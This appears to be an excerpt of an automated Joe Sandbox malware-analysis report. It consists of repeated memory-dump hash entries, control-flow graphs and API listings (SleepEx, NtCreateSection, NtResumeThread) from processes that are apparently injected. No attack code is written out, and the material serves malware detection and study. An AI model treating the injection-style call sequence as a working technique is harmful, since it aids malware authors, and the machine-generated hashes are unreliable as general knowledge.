                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39e6e01a858c43e4c6e037543abee3aa70c2a1c1cd54591c962c02dbd1c773ec
                                            • Instruction ID: 46f15cb20c3bfce56cefe5e4ef954b443e1bb1f2341ef5a176a58adb6a9b2b2d
                                            • Opcode Fuzzy Hash: 39e6e01a858c43e4c6e037543abee3aa70c2a1c1cd54591c962c02dbd1c773ec
                                            • Instruction Fuzzy Hash: 1790026561244803D5807A584944607004547D0303F51C455A3054915ECA3A8D517135
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2da7c51e4f50695ce1e910fcd433f42e4c4c58538ca9c9cb9062344a06a283a
                                            • Instruction ID: 5feccd7cf1ddf8c1dabd004e36182fe22d0f4eb6320ca072f4f2796466c6ae74
                                            • Opcode Fuzzy Hash: f2da7c51e4f50695ce1e910fcd433f42e4c4c58538ca9c9cb9062344a06a283a
                                            • Instruction Fuzzy Hash: 2790026575204842D54076584554B06004587E1302F51C459E2054914DC62ACD527126
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f251f82f7e54bc374151d88dc88130361ae8c9c1a13de4cebb25f246c886ac31
                                            • Instruction ID: 50affb77aa5161f3ee106d78a2f142faa4900e72f0879469ede4cd15c1c07184
                                            • Opcode Fuzzy Hash: f251f82f7e54bc374151d88dc88130361ae8c9c1a13de4cebb25f246c886ac31
                                            • Instruction Fuzzy Hash: 0190026562204442D54476584544706008547E1202F51C456A3144914CC53A8D616125
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e5917ec721fd65ba999bf1d86dcd482cb443518cff065fbd673b1c50d061b976
                                            • Instruction ID: 1f9069d9d1f40397593ce21bdf0493de68ad0c0febab59043e2c223d673cd61d
                                            • Opcode Fuzzy Hash: e5917ec721fd65ba999bf1d86dcd482cb443518cff065fbd673b1c50d061b976
                                            • Instruction Fuzzy Hash: D2900225A120444245807668898490640456BE1212751C565A1988910DC56A8D656665
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a8283053c50ed8f19d7bf18955ca5cca998ca17d74dc77245dfb3d7cda02ef7
                                            • Instruction ID: 8a9c96d56f3321c11f719a8a213afb763f0a752dc4e801b09aeb0dcbad9141bd
                                            • Opcode Fuzzy Hash: 4a8283053c50ed8f19d7bf18955ca5cca998ca17d74dc77245dfb3d7cda02ef7
                                            • Instruction Fuzzy Hash: A790023561244802D54076584948747004547D0303F51C455A6154915EC676CD917531
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 864d5a8fbc28be3713f0df08110689180f903dd63f859aab2a36427cb2ff17ca
                                            • Instruction ID: a3c5a7e5e445504a92ffbb9bf631817968f37dfa96cb3128501da0bf5addb15d
                                            • Opcode Fuzzy Hash: 864d5a8fbc28be3713f0df08110689180f903dd63f859aab2a36427cb2ff17ca
                                            • Instruction Fuzzy Hash: 7590022571204802D54276584554606004987D1346F91C456E2414915DC6368E53B132
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d9b33f1828669f5b848e8ed6afa5ca70740c078b850d373cd37c7df3025e0e8
                                            • Instruction ID: ca533562aaa60ad0a9574c6416f9b8c2e943432b334de22e478c363095fb891c
                                            • Opcode Fuzzy Hash: 6d9b33f1828669f5b848e8ed6afa5ca70740c078b850d373cd37c7df3025e0e8
                                            • Instruction Fuzzy Hash: 5E900225A1204902D54176584544616004A47D0242F91C466A2014915ECA368E92B131
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3b0552ff9735890a6d88fdb806ac29199d73ca58661dbde06e386ff8dfc38de
                                            • Instruction ID: d4644862c2f17f5ca72906e40e4871713101e183ba054d8bf8e9e8b5a8a5fb7c
                                            • Opcode Fuzzy Hash: f3b0552ff9735890a6d88fdb806ac29199d73ca58661dbde06e386ff8dfc38de
                                            • Instruction Fuzzy Hash: 5D90027561204802D58076584544746004547D0302F51C455A6054914EC66A8ED57665
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 659c591a8e425bc13ba7cdcbb5cd11c8502f4ef35aeb29341db401ebd8521303
                                            • Instruction ID: e5e34e2a185104e5c2267eb117e1073de0c0a115bf620245bf39ecc7dbe3070e
                                            • Opcode Fuzzy Hash: 659c591a8e425bc13ba7cdcbb5cd11c8502f4ef35aeb29341db401ebd8521303
                                            • Instruction Fuzzy Hash: EB90023561304542998077585944A4E414547E1303B91D859A1005914CC9258D616221
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebe3dcd93ed222b10a94176d43c43a260f41b264033bdb7390a16636a2931b38
                                            • Instruction ID: 4bf71876bf4992212c4d54c7320cb957b4cc4914fb7d367557bca582743f7cdf
                                            • Opcode Fuzzy Hash: ebe3dcd93ed222b10a94176d43c43a260f41b264033bdb7390a16636a2931b38
                                            • Instruction Fuzzy Hash: DA90022D62304402D5C07658554860A004547D1203F91D859A1005918CC9268D696321
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e95c974b167a25eb68f59fa4220bba5d3950d95848c7b98e16f6be21aa89483
                                            • Instruction ID: de206a478f5c29ed794765118b47a2c3a375e3f06dd3d2d7bbd2a3e5fc25fadf
                                            • Opcode Fuzzy Hash: 9e95c974b167a25eb68f59fa4220bba5d3950d95848c7b98e16f6be21aa89483
                                            • Instruction Fuzzy Hash: D290022561608842D5407A585548A06004547D0206F51D455A2054955DC6368D51B131
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a2174738671768032402cfd24f98cfba396f4f78f0345eefc09cdb0493bad1a
                                            • Instruction ID: 45817079f768cb9ff73bb20fa2cb8a8b8f028cf91d81b93939a9bba0ab2f8a03
                                            • Opcode Fuzzy Hash: 9a2174738671768032402cfd24f98cfba396f4f78f0345eefc09cdb0493bad1a
                                            • Instruction Fuzzy Hash: 9E90023561204803D54076585648707004547D0202F51D855A1414918DD6678D517121
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc9d7a15d8114259bfaa3282afa474a1363d3c3b40df289d5a06f25b121fa6bc
                                            • Instruction ID: b2af61c3764da6d9c218c05af3acf6bade40d6fcbc8e4e6a0cfa0e075d055ea5
                                            • Opcode Fuzzy Hash: cc9d7a15d8114259bfaa3282afa474a1363d3c3b40df289d5a06f25b121fa6bc
                                            • Instruction Fuzzy Hash: 9490022571204403D58076585558606404597E1302F51D455E1404914CD9268D566222
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 831b2add7d72326b81cc9fe0b4600daaa804190407d4bf6667255792e51e0db7
                                            • Instruction ID: 0a3b4f13421ea546e3798beff03435eaa73f36ab07afac824bfba381c3ebc413
                                            • Opcode Fuzzy Hash: 831b2add7d72326b81cc9fe0b4600daaa804190407d4bf6667255792e51e0db7
                                            • Instruction Fuzzy Hash: 5B90023961204802D95076585944646008647D0302F51D855A1414918DC6658DA1B121
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee01bb3cad9827c3e4482a4972a1313f5fc5469f62be410be3a80837c92c9fba
                                            • Instruction ID: db0bb610a3d5b99d4e054f6d724b7cfef13f60fd3ba2553657a0a318eafbf0c7
                                            • Opcode Fuzzy Hash: ee01bb3cad9827c3e4482a4972a1313f5fc5469f62be410be3a80837c92c9fba
                                            • Instruction Fuzzy Hash: 66900225653085525985B6584544507404657E0242791C456A2404D10CC5379D56E621
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61b3d91305201e26ed0a7bde02065698c76ab72c2f5a6690d97c83c3c57d28e3
                                            • Instruction ID: cdeed1ebc4e69f5cea91ae498110e432e0f2fa80bbf44bfe885bbd86fefa883c
                                            • Opcode Fuzzy Hash: 61b3d91305201e26ed0a7bde02065698c76ab72c2f5a6690d97c83c3c57d28e3
                                            • Instruction Fuzzy Hash: 1D90023565204802D58176584544606004957D0242F91C456A1414914EC6668F56BA61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 5c41006d8fb9487cb63e7137757846efde4471df8881892f3689863adaca264b
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 769 23327550-23327571 770 23327573-2332758f call 232fe580 769->770 771 233275ab-233275b9 call 23334b50 769->771 776 23364443 770->776 777 23327595-233275a2 770->777 781 2336444a-23364450 776->781 778 233275a4 777->778 779 233275ba-233275c9 call 23327738 777->779 778->771 785 23327621-2332762a 779->785 786 233275cb-233275e1 call 233276ed 779->786 783 23364456-233644c3 call 2337ef10 call 23338f40 BaseQueryModuleData 781->783 784 233275e7-233275f0 call 23327648 781->784 783->784 807 233644c9-233644d1 783->807 784->785 794 233275f2 784->794 789 233275f8-23327601 785->789 786->781 786->784 796 23327603-23327612 call 2332763b 789->796 797 2332762c-2332762e 789->797 794->789 798 23327614-23327616 796->798 797->798 802 23327630-23327639 798->802 803 23327618-2332761a 798->803 802->803 803->778 804 2332761c 803->804 806 233645c9-233645db call 23332b70 804->806 806->778 807->784 809 233644d7-233644de 807->809 809->784 810 233644e4-233644ef 809->810 812 233645c4 call 23334c68 810->812 813 233644f5-2336452e call 2337ef10 call 2333a9c0 810->813 812->806 819 23364546-23364576 call 2337ef10 813->819 820 23364530-23364541 call 2337ef10 813->820 819->784 825 2336457c-2336458a call 2333a690 819->825 820->785 828 23364591-233645ae call 2337ef10 call 2336cc1e 825->828 829 2336458c-2336458e 825->829 828->784 834 233645b4-233645bd 828->834 829->828 834->825 835 233645bf 834->835 835->784
                                            Strings
                                            • Execute=1, xrefs: 2336451E
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 23364592
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 23364460
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 2336454D
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 23364507
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 23364530
                                            • ExecuteOptions, xrefs: 233644AB
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 0dd9d5eca64b2d5bb47c8b9ffc8786d3a208446c9384f6a489f5fbed3c6e777e
                                            • Instruction ID: bfd29bfe4f0f62aabd523478001cfbd06bb58fcd5261bca568def26c9397b23f
                                            • Opcode Fuzzy Hash: 0dd9d5eca64b2d5bb47c8b9ffc8786d3a208446c9384f6a489f5fbed3c6e777e
                                            • Instruction Fuzzy Hash: 95512631E007196EDB20AB94DC95FAD77ACBF18710F1404E9E605A7186DA30AF458FA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 232C0000, based on PE: true
                                            • Associated: 0000000C.00000002.20335399727.00000000233E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.20335399727.00000000233ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_232c0000_wab.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 2fc014059ce501db4820c5a67cf23768d7daa7cffa0ec48d98959ca783ea3b7a
                                            • Instruction ID: c35de8a04db9c9322328ae8b3ff771431ed1d24275dc7466b932ad18bcac612a
                                            • Opcode Fuzzy Hash: 2fc014059ce501db4820c5a67cf23768d7daa7cffa0ec48d98959ca783ea3b7a
                                            • Instruction Fuzzy Hash: 638129B1D012699BDB35DB54CC44BDEB6B8AF08710F0441EAEA19F7290D7709F848FA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:1.8%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:14
                                            Total number of Limit Nodes:1
                                            execution_graph 4394 6e67f87 4396 6e67f8d 4394->4396 4395 6e6808a 4396->4395 4398 6e642b4 4396->4398 4399 6e642da 4398->4399 4400 6e64314 SleepEx 4399->4400 4402 6e642ff 4399->4402 4400->4399 4403 6e64348 4400->4403 4401 6e64387 NtResumeThread 4401->4402 4402->4395 4403->4401 4403->4402 4404 6e64135 4405 6e64144 SleepEx 4404->4405 4406 6e64194 NtCreateSection 4405->4406 4407 6e64152 4405->4407 4408 6e64171 4406->4408 4407->4405 4407->4408

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.21027232710.0000000006DC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_6dc0000_RAVCpl64.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: @$@
                                            • API String ID: 3472027048-149943524
                                            • Opcode ID: 09e44b2fdef028d96e36835713902b7ae6c3423895b9c418cb27c1a9b3036b34
                                            • Instruction ID: 7ea1fe3c77af4f45f3a96c81dd3117b110bc03dcb1873480c29764e925bcc1d0
                                            • Opcode Fuzzy Hash: 09e44b2fdef028d96e36835713902b7ae6c3423895b9c418cb27c1a9b3036b34
                                            • Instruction Fuzzy Hash: 2251AD71A28B08CFCB58DF58D89129EBBF4FB58740F10511EF88A93280D734E606CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 18 6e642b0-6e642d3 19 6e642da-6e642fd call 6e6f164 18->19 20 6e642d5 call 6e614c4 18->20 23 6e64307-6e6430e 19->23 24 6e642ff-6e64305 19->24 20->19 25 6e64314-6e6431e SleepEx 23->25 26 6e64334-6e64347 24->26 27 6e64320-6e64325 25->27 28 6e64348-6e64350 25->28 27->25 29 6e64327-6e6432d 27->29 30 6e64387-6e64394 NtResumeThread 28->30 31 6e64352-6e64385 call 6e61564 call 6e6f164 28->31 33 6e6432f-6e64330 29->33 30->29 32 6e64396-6e643a1 30->32 31->29 31->30 32->33 33->26
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.21027232710.0000000006DC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_6dc0000_RAVCpl64.jbxd
                                            Similarity
                                            • API ID: ResumeSleepThread
                                            • String ID:
                                            • API String ID: 1530989685-0
                                            • Opcode ID: 4634fa28b9d5cd2139c3252cb622fc8072116daef5029a96a176cecc00ba1d27
                                            • Instruction ID: 9aca86235d932619079c9101d613f0937906a0b62986699314ef4b09760fadc1
                                            • Opcode Fuzzy Hash: 4634fa28b9d5cd2139c3252cb622fc8072116daef5029a96a176cecc00ba1d27
                                            • Instruction Fuzzy Hash: 8321E570598B8D8FD7E8EF2988587AAB7D0FB55354F105329E85AC3191EF30D681C781
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 38 6e64135-6e6413d 39 6e64144-6e64150 SleepEx 38->39 40 6e64194-6e641e9 NtCreateSection 39->40 41 6e64152-6e64156 39->41 42 6e64171-6e64178 40->42 43 6e641eb-6e64204 40->43 44 6e6416a-6e6416f 41->44 45 6e64158-6e64165 call 6e6fb34 41->45 46 6e6417a-6e64193 42->46 43->42 49 6e6420a-6e64249 43->49 44->39 44->42 45->44 49->42 51 6e6424f-6e6428d 49->51 51->42 53 6e64293-6e642ab 51->53 53->46
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.21027232710.0000000006DC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_6dc0000_RAVCpl64.jbxd
                                            Similarity
                                            • API ID: CreateSectionSleep
                                            • String ID:
                                            • API String ID: 2866269021-0
                                            • Opcode ID: 273e713e461deeb3e9a0f12556189f3c2e3b19d3e02d2f50c97832c04f65c0a2
                                            • Instruction ID: 150eff3bf89cfab8b4fc3632ab85104d70f40e6acd76edebe7d67b6abb00dc39
                                            • Opcode Fuzzy Hash: 273e713e461deeb3e9a0f12556189f3c2e3b19d3e02d2f50c97832c04f65c0a2
                                            • Instruction Fuzzy Hash: 63F02432A68B08CBD7595F58DC422FC73A1FB82370F00162AD065021E2C6369067C2C9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.21027232710.0000000006DC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_6dc0000_RAVCpl64.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6233f53734ce5c41217981643a50337326512aaf34924896a3ce7d37aca5172
                                            • Instruction ID: ed1b930981789f40d2464542c87c1615467f5335166e5f35a0772513627414fc
                                            • Opcode Fuzzy Hash: e6233f53734ce5c41217981643a50337326512aaf34924896a3ce7d37aca5172
                                            • Instruction Fuzzy Hash: 36510730658F094FD7A8EF6ED4816A6B3E2FB89350F50192DE49AC3252DB74E842C785
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:3.5%
                                            Dynamic/Decrypted Code Coverage:3.9%
                                            Signature Coverage:1.4%
                                            Total number of Nodes:516
                                            Total number of Limit Nodes:80
